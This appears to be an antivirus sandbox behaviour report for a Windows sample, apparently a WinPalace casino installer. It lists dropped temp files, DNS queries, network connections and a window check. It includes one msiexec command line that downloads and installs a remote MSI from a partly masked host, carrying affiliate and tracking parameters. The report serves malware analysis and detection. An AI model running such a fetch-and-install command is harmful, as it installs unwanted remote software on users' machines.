Техническая информация
- %TEMP%\7diHx.exe
- <SYSTEM32>\msiexec.exe /i "http://bf###.#ontentdnfiles.eu/36175/cdn/winpalace/WinPalace20120624082441.msi" DDC_DID=4791625 DDC_RTGURL=http://www.dl##tup.com/dl/TrackSetup/TrackSetup.aspx?DI########################################################### DDC_DOWNLOAD_AFFID=35317 DDC_UPDATESTATUSURL=http://20#.##0.154.71:8080/winpalace/Lobby.WebServices/Installer.asmx CUSTOMNAME02=redirectAsData CUSTOMVALUE02=1 CUSTOMNAME03=remoteIP CUSTOMVALUE03=62.68.86.205 CUSTOMNAME04=name CUSTOMNAME05=email CUSTOMNAME06=redirect CUSTOMNAME07=version CUSTOMVALUE07=100 CUSTOMNAME08=camefrom CUSTOMNAME09=adid CUSTOMVALUE09=NULL CUSTOMNAME10=affreferrer SETUPEXEDIR="%HOMEPATH%\Local Settings\Temp" SETUPEXENAME="7diHx.exe"
- %TEMP%\~3.tmp
- %TEMP%\_is4.tmp
- %TEMP%\_is6.tmp
- %WINDIR%\Installer\MSI7.tmp
- %TEMP%\~5.tmp
- %TEMP%\{C7E289A1-060B-44AE-8FD9-C8E3372097C4}\0x0409.ini
- %TEMP%\_is1.tmp
- %TEMP%\7diHx.exe
- %TEMP%\{C7E289A1-060B-44AE-8FD9-C8E3372097C4}\Setup.INI
- %TEMP%\_is2.tmp
- %TEMP%\{C7E289A1-060B-44AE-8FD9-C8E3372097C4}\_ISMSIDEL.INI
- %TEMP%\_is6.tmp
- %TEMP%\~5.tmp
- %WINDIR%\Installer\MSI7.tmp
- %TEMP%\~3.tmp
- %TEMP%\_is1.tmp
- %TEMP%\_is2.tmp
- %TEMP%\_is4.tmp
- 'bf###.#ontentdnfiles.eu':80
- 'wp#d':80
- bf###.#ontentdnfiles.eu/36175/cdn/winpalace/WinPalace20120624082441.msi
- wp#d/wpad.dat
- DNS ASK bf###.#ontentdnfiles.eu
- DNS ASK wp#d
- ClassName: 'Shell_TrayWnd' WindowName: ''